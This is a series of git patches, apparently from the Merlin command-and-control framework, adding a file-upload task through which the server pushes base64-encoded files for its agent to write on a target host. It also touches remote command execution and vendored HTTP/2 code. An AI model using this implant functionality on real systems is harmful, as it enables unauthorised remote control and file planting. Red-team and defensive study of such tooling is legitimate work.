n.setParent(parent) - n.weight = priority.Weight -} - -func (ws *priorityWriteScheduler) Push(wr FrameWriteRequest) { - var n *priorityNode - if id := wr.StreamID(); id == 0 { - n = &ws.root - } else { - n = ws.nodes[id] - if n == nil { - // id is an idle or closed stream. wr should not be a HEADERS or - // DATA frame. However, wr can be a RST_STREAM. In this case, we - // push wr onto the root, rather than creating a new priorityNode, - // since RST_STREAM is tiny and the stream's priority is unknown - // anyway. See issue #17919. - if wr.DataSize() > 0 { - panic("add DATA on non-open stream") - } - n = &ws.root - } - } - n.q.push(wr) -} - -func (ws *priorityWriteScheduler) Pop() (wr FrameWriteRequest, ok bool) { - ws.root.walkReadyInOrder(false, &ws.tmp, func(n *priorityNode, openParent bool) bool { - limit := int32(math.MaxInt32) - if openParent { - limit = ws.writeThrottleLimit - } - wr, ok = n.q.consume(limit) - if !ok { - return false - } - n.addBytes(int64(wr.DataSize())) - // If B depends on A and B continuously has data available but A - // does not, gradually increase the throttling limit to allow B to - // steal more and more bandwidth from A. - if openParent { - ws.writeThrottleLimit += 1024 - if ws.writeThrottleLimit < 0 { - ws.writeThrottleLimit = math.MaxInt32 - } - } else if ws.enableWriteThrottle { - ws.writeThrottleLimit = 1024 - } - return true - }) - return wr, ok -} - -func (ws *priorityWriteScheduler) addClosedOrIdleNode(list *[]*priorityNode, maxSize int, n *priorityNode) { - if maxSize == 0 { - return - } - if len(*list) == maxSize { - // Remove the oldest node, then shift left. - ws.removeNode((*list)[0]) - x := (*list)[1:] - copy(*list, x) - *list = (*list)[:len(x)] - } - *list = append(*list, n) -} - -func (ws *priorityWriteScheduler) removeNode(n *priorityNode) { - for k := n.kids; k != nil; k = k.next { - k.setParent(n.parent) - } - n.setParent(nil) - delete(ws.nodes, n.id) -} diff --git a/vendor/golang.org/x/net/http2/writesched_random.go b/vendor/golang.org/x/net/http2/writesched_random.go deleted file mode 100644 index 36d7919f..00000000 --- a/vendor/golang.org/x/net/http2/writesched_random.go +++ /dev/null @@ -1,72 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import "math" - -// NewRandomWriteScheduler constructs a WriteScheduler that ignores HTTP/2 -// priorities. Control frames like SETTINGS and PING are written before DATA -// frames, but if no control frames are queued and multiple streams have queued -// HEADERS or DATA frames, Pop selects a ready stream arbitrarily. -func NewRandomWriteScheduler() WriteScheduler { - return &randomWriteScheduler{sq: make(map[uint32]*writeQueue)} -} - -type randomWriteScheduler struct { - // zero are frames not associated with a specific stream. - zero writeQueue - - // sq contains the stream-specific queues, keyed by stream ID. - // When a stream is idle or closed, it's deleted from the map. - sq map[uint32]*writeQueue - - // pool of empty queues for reuse. - queuePool writeQueuePool -} - -func (ws *randomWriteScheduler) OpenStream(streamID uint32, options OpenStreamOptions) { - // no-op: idle streams are not tracked -} - -func (ws *randomWriteScheduler) CloseStream(streamID uint32) { - q, ok := ws.sq[streamID] - if !ok { - return - } - delete(ws.sq, streamID) - ws.queuePool.put(q) -} - -func (ws *randomWriteScheduler) AdjustStream(streamID uint32, priority PriorityParam) { - // no-op: priorities are ignored -} - -func (ws *randomWriteScheduler) Push(wr FrameWriteRequest) { - id := wr.StreamID() - if id == 0 { - ws.zero.push(wr) - return - } - q, ok := ws.sq[id] - if !ok { - q = ws.queuePool.get() - ws.sq[id] = q - } - q.push(wr) -} - -func (ws *randomWriteScheduler) Pop() (FrameWriteRequest, bool) { - // Control frames first. - if !ws.zero.empty() { - return ws.zero.shift(), true - } - // Iterate over all non-idle streams until finding one that can be consumed. - for _, q := range ws.sq { - if wr, ok := q.consume(math.MaxInt32); ok { - return wr, true - } - } - return FrameWriteRequest{}, false -} diff --git a/vendor/vendor.json b/vendor/vendor.json deleted file mode 100644 index 662f9463..00000000 --- a/vendor/vendor.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "comment": "", - "ignore": "test", - "package": [ - { - "checksumSHA1": "K2hmSp4Kv/6PEBs/aXFpKrGFDvk=", - "path": "github.com/chzyer/readline", - "revision": "41eea22f717c616615e1e59aa06cf831f9901f35", - "revisionTime": "2017-03-13T23:49:21Z" - }, - { - "checksumSHA1": "AXA+JyaZ70zQ49yj43VfPVi0OPs=", - "path": "github.com/fatih/color", - "revision": "bf82308e8c8546dc2b945157173eb8a959ae9505", - "revisionTime": "2016-10-25T12:05:01Z" - }, - { - "checksumSHA1": "+a74DVHv7qMIr5BEg1PnPOdgaT4=", - "path": "github.com/mattn/go-shellwords", - "revision": "95c860c1895b21b58903abdd1d9c591560b0601c", - "revisionTime": "2017-08-28T04:11:23Z" - }, - { - "checksumSHA1": "Pc8xXumeXymW7wNgN5lNW8RG9kU=", - "path": "github.com/olekukonko/tablewriter", - "revision": "febf2d34b54a69ce7530036c7503b1c9fbfdf0bb", - "revisionTime": "2017-01-28T05:05:32Z" - }, - { - "checksumSHA1": "HUXE+Nrcau8FSaVEvPYHMvDjxOE=", - "path": "github.com/satori/go.uuid", - "revision": "b061729afc07e77a8aa4fad0a2fd840958f1942a", - "revisionTime": "2016-09-27T10:08:44Z" - }, - { - "checksumSHA1": "kKuxyoDujo5CopTxAvvZ1rrLdd0=", - "path": "golang.org/x/net/http2", - "revision": "054b33e6527139ad5b1ec2f6232c3b175bd9a30c", - "revisionTime": "2017-07-05T22:25:54Z" - } - ], - "rootPath": "github.com/ne0nd0g/merlin" -} From ca8eaee6e353c12a1cb5229f2bf85fe9976de248 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 11:25:52 -0500 Subject: [PATCH 08/60] Upload start --- Makefile | 2 +- cmd/merlinagent/main.go | 11 +++++++++++ cmd/merlinserver/main.go | 28 ++++++++++++++++++++++++++++ pkg/messages/messages.go | 7 +++++++ 4 files changed, 47 insertions(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 54b77d90..ea75f722 100644 --- a/Makefile +++ b/Makefile @@ -23,7 +23,7 @@ D=Darwin-x64 $(shell mkdir -p ${DIR}) # Change default to just make for the host OS and add MAKE ALL to do this -default: server-windows agent-windows server-linux agent-linux server-darwin agent-darwin +default: server-darwin agent-darwin all: default diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 0229871a..2583eae9 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -258,6 +258,17 @@ func statusCheckIn(host string, client *http.Client) { color.Green("%s Message Type Received!", j.Type) } switch j.Type { // TODO add self destruct that will find the .exe current path and start a new process to delete it after initial sleep + case "UploadFile": + var p messages.UploadFile + json.Unmarshal(payload, &p) + + if verbose { + color.Yellow("Writing blob to : %s", p.Dest) + } + resp2, _ := client.Post(host, "application/json; charset=utf-8", b2) + if resp2.StatusCode != 200 { + color.Red("Message error from server. HTTP Status code: %d", resp2.StatusCode) + } case "CmdPayload": var p messages.CmdPayload json.Unmarshal(payload, &p) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index dea71bad..cc50979c 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -408,6 +408,18 @@ func statusCheckIn(j messages.Base) messages.Base { } switch command[1] { + case "upload": + p := messages.UploadFile{ + Dest: command[4], + FileBlob: command[3], + Job: jobID, + } + + k := marshalMessage(p) + m.Type = "UploadFile" + m.Payload = (*json.RawMessage)(&k) + + return m case "cmd": p := messages.CmdPayload{ Command: command[3], @@ -480,6 +492,7 @@ func usage() { data := [][]string{ {"agent cmd", " ", "", "Run a command on target's operating system"}, + {"agent upload", " ", "", "Upload a file to target"}, {"agent control", " ", "sleep, kill, padding", "Control messages & " + "functions to the agent itself"}, {"agent info", "", "", "Display all information about an agent"}, @@ -525,6 +538,9 @@ func shell() { readline.PcItem("cmd", agentCompleter, ), + readline.PcItem("upload", + agentCompleter, + ), readline.PcItem("control", readline.PcItemDynamic(getAgentList(), readline.PcItem("sleep"), @@ -620,6 +636,18 @@ func shell() { table.Render() fmt.Println() } + case "upload": + if len(cmd) >= 5 { + addChannel(cmd) + cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3])) + if debug { + color.Red("[DEBUG]Input: %s", cmd[3]) + color.Red("[DEBUG]Base64 Input: %s", cmdAgent) + } + } else { + color.Red("[!]Invalid file or path") + color.White("agent upload ") + } case "cmd": if len(cmd) >= 4 { addChannel(cmd) diff --git a/pkg/messages/messages.go b/pkg/messages/messages.go index 07c3eb08..a194f3d7 100644 --- a/pkg/messages/messages.go +++ b/pkg/messages/messages.go @@ -30,6 +30,13 @@ type Base struct { Padding string `json:"padding"` } +// UploadFile is the JSON payload for files to be uploaded to an agent +type UploadFile struct { + Dest string `json:"dest"` + FileBlob string `json:"blob"` + Job string `json:"job"` +} + // CmdPayload is the JSON payload for commands to execute on an agent type CmdPayload struct { Command string `json:"executable"` From 9395f43515bf5bdec181c88c13df3d4570e3af4a Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 12:00:49 -0500 Subject: [PATCH 09/60] Removed the remote packaging of the local depedencies --- cmd/merlinagent/main.go | 8 ++------ cmd/merlinserver/main.go | 6 +++--- 2 files changed, 5 insertions(+), 9 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 2583eae9..8df2df00 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -35,8 +35,8 @@ import ( "github.com/satori/go.uuid" "golang.org/x/net/http2" - "github.com/ne0nd0g/merlin/pkg/agent" - "github.com/ne0nd0g/merlin/pkg/messages" + "../../pkg/agent" + "../../pkg/messages" ) // GLOBAL VARIABLES @@ -265,10 +265,6 @@ func statusCheckIn(host string, client *http.Client) { if verbose { color.Yellow("Writing blob to : %s", p.Dest) } - resp2, _ := client.Post(host, "application/json; charset=utf-8", b2) - if resp2.StatusCode != 200 { - color.Red("Message error from server. HTTP Status code: %d", resp2.StatusCode) - } case "CmdPayload": var p messages.CmdPayload json.Unmarshal(payload, &p) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index cc50979c..a66b58e6 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -41,9 +41,9 @@ import ( "github.com/satori/go.uuid" // Merlin - "github.com/ne0nd0g/merlin/pkg" - "github.com/ne0nd0g/merlin/pkg/banner" - "github.com/ne0nd0g/merlin/pkg/messages" + "../../pkg" + "../../pkg/banner" + "../../pkg/messages" ) // Global Variables From 3b5968f6d5c78bb6f26b7718fc36ba05fada9349 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 16:16:40 -0500 Subject: [PATCH 10/60] Basic file upload, limited error checking --- cmd/merlinagent/main.go | 14 ++++++++++++-- cmd/merlinserver/main.go | 21 ++++++++++++++++----- 2 files changed, 28 insertions(+), 7 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 8df2df00..2f6b0640 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -20,9 +20,11 @@ package main import ( "bytes" "crypto/tls" + "encoding/base64" "encoding/json" "flag" "fmt" + "io/ioutil" "math/rand" "net/http" "os" @@ -45,7 +47,7 @@ var debug = false var verbose = false var mRun = true var hostUUID = uuid.NewV4() -var url = "https://127.0.0.1:443/" +var url = "https://127.0.0.1:4433/" var h2Client = getH2WebClient() var waitTime = 30000 * time.Millisecond var agentShell = "" @@ -261,8 +263,16 @@ func statusCheckIn(host string, client *http.Client) { case "UploadFile": var p messages.UploadFile json.Unmarshal(payload, &p) + d1, _ := base64.StdEncoding.DecodeString(p.FileBlob) + err := ioutil.WriteFile(p.Dest, d1, 0644) + if err != nil { + if verbose { + color.Red("[!]There was an error writing to : %s", p.Dest) + color.Red(err.Error()) + } + } - if verbose { + if verbose || debug { color.Yellow("Writing blob to : %s", p.Dest) } case "CmdPayload": diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index a66b58e6..9a2b7ed2 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -25,6 +25,7 @@ import ( "flag" "fmt" "io" + "io/ioutil" "log" "math/rand" "net/http" @@ -88,7 +89,7 @@ func main() { flag.BoolVar(&verbose, "v", false, "Enable verbose output") flag.BoolVar(&debug, "debug", false, "Enable debug output") - port := flag.Int("p", 443, "Merlin Server Port") + port := flag.Int("p", 4433, "Merlin Server Port") ip := flag.String("i", "0.0.0.0", "The IP address of the interface to bind to") crt := flag.String("x509cert", filepath.Join(string(currentDir), "data", "x509", "server.crt"), "The x509 certificate for the HTTPS listener") @@ -409,9 +410,10 @@ func statusCheckIn(j messages.Base) messages.Base { switch command[1] { case "upload": + fileData := getFiledata(command[3]) p := messages.UploadFile{ Dest: command[4], - FileBlob: command[3], + FileBlob: fileData, Job: jobID, } @@ -639,10 +641,8 @@ func shell() { case "upload": if len(cmd) >= 5 { addChannel(cmd) - cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3])) if debug { - color.Red("[DEBUG]Input: %s", cmd[3]) - color.Red("[DEBUG]Base64 Input: %s", cmdAgent) + color.Red("[DEBUG]Input: %s", strings.Join(cmd[3:], " ")) } } else { color.Red("[!]Invalid file or path") @@ -764,6 +764,15 @@ func marshalMessage(m interface{}) []byte { return k } +func getFiledata(filePath string) string { + dat, err := ioutil.ReadFile(filePath) + if err != nil { + color.Red("There was an error reading %s", filePath) + color.Red(err.Error()) + } + return base64.StdEncoding.EncodeToString([]byte(dat)) +} + func addChannel(cmd []string) { a, err := uuid.FromString(cmd[2]) if err != nil { @@ -799,3 +808,5 @@ type agent struct { // TODO add warning for using distributed TLS cert // TODO change default useragent from Go-http-client/2.0 // TODO add CSRF tokens +// TODO check if agentLog exists even outside of InitialCheckIn +// TODO readline for file paths to use with upload From 057ecd04903db6e7c7fbd60cd46b004fe0b03261 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 16:29:35 -0500 Subject: [PATCH 11/60] Using Fields for better command parsing --- cmd/merlinserver/main.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index 9a2b7ed2..8b8150f6 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -591,7 +591,7 @@ func shell() { } line = strings.TrimSpace(line) - cmd := strings.Split(line, " ") + cmd := strings.Fields(line) switch cmd[0] { case "agent": From 744f44d74104bad4769b2f88ad139f88585c8d14 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Fri, 22 Dec 2017 16:53:49 -0500 Subject: [PATCH 12/60] Error handling for FileUpload Checking base64 decode and file existance during tasking --- cmd/merlinagent/main.go | 10 +- cmd/merlinserver/main.go | 244 ++++++++++++++++++++------------------- 2 files changed, 134 insertions(+), 120 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 2f6b0640..1cbd67e7 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -263,8 +263,14 @@ func statusCheckIn(host string, client *http.Client) { case "UploadFile": var p messages.UploadFile json.Unmarshal(payload, &p) - d1, _ := base64.StdEncoding.DecodeString(p.FileBlob) - err := ioutil.WriteFile(p.Dest, d1, 0644) + d1, err := base64.StdEncoding.DecodeString(p.FileBlob) + if err != nil { + if verbose { + color.Red("[!]There was an error decoding the fileBlob") + color.Red(err.Error()) + } + } + err = ioutil.WriteFile(p.Dest, d1, 0644) if err != nil { if verbose { color.Red("[!]There was an error writing to : %s", p.Dest) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index 8b8150f6..36248970 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -593,146 +593,154 @@ func shell() { line = strings.TrimSpace(line) cmd := strings.Fields(line) - switch cmd[0] { - case "agent": - if len(cmd) > 1 { - switch cmd[1] { - case "list": - table := tablewriter.NewWriter(os.Stdout) - table.SetHeader([]string{"Agent GUID", "Platform", "User", "Host", "Transport"}) - table.SetAlignment(tablewriter.ALIGN_CENTER) - for k, v := range agents { - table.Append([]string{k.String(), v.platform + "/" + v.architecture, v.userName, - v.hostName, "HTTP/2"}) - } - fmt.Println() - table.Render() - fmt.Println() - case "info": - if len(cmd) == 2 { - color.Red("[!]Invalid command") - color.White("agent info ") - } else if len(cmd) >= 3 { - a, _ := uuid.FromString(cmd[2]) + if len(cmd) > 0 { + switch cmd[0] { + case "agent": + if len(cmd) > 1 { + switch cmd[1] { + case "list": table := tablewriter.NewWriter(os.Stdout) - table.SetAlignment(tablewriter.ALIGN_LEFT) - data := [][]string{ - {"ID", agents[a].id.String()}, - {"Platform", agents[a].platform}, - {"Architecture", agents[a].architecture}, - {"UserName", agents[a].userName}, - {"User GUID", agents[a].userGUID}, - {"Hostname", agents[a].hostName}, - {"Process ID", strconv.Itoa(agents[a].pid)}, - {"Initial Check In", agents[a].iCheckIn.String()}, - {"Last Check In", agents[a].sCheckIn.String()}, - {"Agent Version", agents[a].version}, - {"Agent Build", agents[a].build}, - {"Agent Wait Time", agents[a].waitTime}, - {"Agent Message Padding Max", strconv.Itoa(agents[a].paddingMax)}, - {"Agent Max Retries", strconv.Itoa(agents[a].maxRetry)}, - {"Agent Failed Logins", strconv.Itoa(agents[a].failedCheckin)}, + table.SetHeader([]string{"Agent GUID", "Platform", "User", "Host", "Transport"}) + table.SetAlignment(tablewriter.ALIGN_CENTER) + for k, v := range agents { + table.Append([]string{k.String(), v.platform + "/" + v.architecture, v.userName, + v.hostName, "HTTP/2"}) } - table.AppendBulk(data) fmt.Println() table.Render() fmt.Println() - } - case "upload": - if len(cmd) >= 5 { - addChannel(cmd) - if debug { - color.Red("[DEBUG]Input: %s", strings.Join(cmd[3:], " ")) - } - } else { - color.Red("[!]Invalid file or path") - color.White("agent upload ") - } - case "cmd": - if len(cmd) >= 4 { - addChannel(cmd) - cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3])) - if debug { - color.Red("[DEBUG]Input: %s", cmd[3]) - color.Red("[DEBUG]Base64 Input: %s", cmdAgent) + case "info": + if len(cmd) == 2 { + color.Red("[!]Invalid command") + color.White("agent info ") + } else if len(cmd) >= 3 { + a, _ := uuid.FromString(cmd[2]) + table := tablewriter.NewWriter(os.Stdout) + table.SetAlignment(tablewriter.ALIGN_LEFT) + data := [][]string{ + {"ID", agents[a].id.String()}, + {"Platform", agents[a].platform}, + {"Architecture", agents[a].architecture}, + {"UserName", agents[a].userName}, + {"User GUID", agents[a].userGUID}, + {"Hostname", agents[a].hostName}, + {"Process ID", strconv.Itoa(agents[a].pid)}, + {"Initial Check In", agents[a].iCheckIn.String()}, + {"Last Check In", agents[a].sCheckIn.String()}, + {"Agent Version", agents[a].version}, + {"Agent Build", agents[a].build}, + {"Agent Wait Time", agents[a].waitTime}, + {"Agent Message Padding Max", strconv.Itoa(agents[a].paddingMax)}, + {"Agent Max Retries", strconv.Itoa(agents[a].maxRetry)}, + {"Agent Failed Logins", strconv.Itoa(agents[a].failedCheckin)}, + } + table.AppendBulk(data) + fmt.Println() + table.Render() + fmt.Println() } - } else { - color.Red("[!]Invalid command") - color.White("agent cmd ") - } - case "kill": - if len(cmd) == 3 { - addChannel(cmd) - } else { - color.Red("[!]Invalid command") - color.White("agent kill ") - } - case "control": - switch cmd[3] { - case "kill": - addChannel(cmd) - case "sleep": + case "upload": if len(cmd) == 5 { - _, err := time.ParseDuration(cmd[4]) - if err != nil { - color.Red("[!]There was an error setting the agent sleep time") - color.Red(err.Error()) - } else { + _, err := os.Stat(cmd[3]) + if err == nil { addChannel(cmd) + if debug { + color.Red("[DEBUG] Uploading: %s", strings.Join(cmd[3:], " ")) + } + } else { + color.Red("[!] Local file : %s does not exist", cmd[3]) } } else { - color.Red("[!]Invalid command") - color.White("agent control sleep